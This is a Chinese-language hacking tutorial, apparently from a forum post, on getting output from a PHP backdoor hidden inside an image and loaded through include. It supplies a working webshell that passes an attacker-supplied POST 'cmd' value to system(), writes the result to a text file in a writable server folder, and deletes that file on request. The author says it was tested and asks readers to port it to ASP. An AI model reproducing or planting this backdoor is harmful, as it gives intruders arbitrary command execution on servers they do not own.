首先让我们想一想为什么图片后门是没有回显的原因:大家知道,我们用include包含图片之后,解释器就会把图片当作文本文档进行寻找并自动解析<% %>或<??>中的脚本.所以其他什么html格式的字符如<script language=javascript>、<html>之类的解释器是不会管的.有的人会讲:我知道,这些本来就是由客户端浏览器解析的吗```为什么我在浏览器上看不到?其实很好解释:因为我们这些字符是在图片中的,所以浏览器并不能真正"看到"而是把它当作图片的一部分,只是会把这张图片显示出来而已.也就是说:这种方法只能运行asp/php之类的服务端解析脚本.那我们该怎么办?这样我们在客户端不是什么也看不到了吗?连脚本是否正确运行了我们都不敢确定```汗```
我们换一个想法:反正既然能够肯定可以执行脚本,那我们就把后门运行的结果通过脚本写到服务器的文件中,然后再访问.不就可以看到回显了吗?
这种想法要有个条件: 至少有一个文件夹可写.
先看看我插入图片的脚本,是一个cmd.php.可以把运行结果放在服务器当前目录下jieguo.txt文件中,注意对方最好没有同名文件,这可是会覆盖文件的```(由于我不会asp,所以这次还是用php
举例)
这是脚本的内容:
CODE<?
if ($_POST['cmd']){
if ($_POST['cmd']=="del"){
@unlink("./jieguo.txt");
}else{
if (is_writeable ("./")){
@system($_POST['cmd']." > jieguo.txt");
exit;
}
}
}
?>
经测试成功,谁有空的话,把脚本改为asp的,我先谢了。
|
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)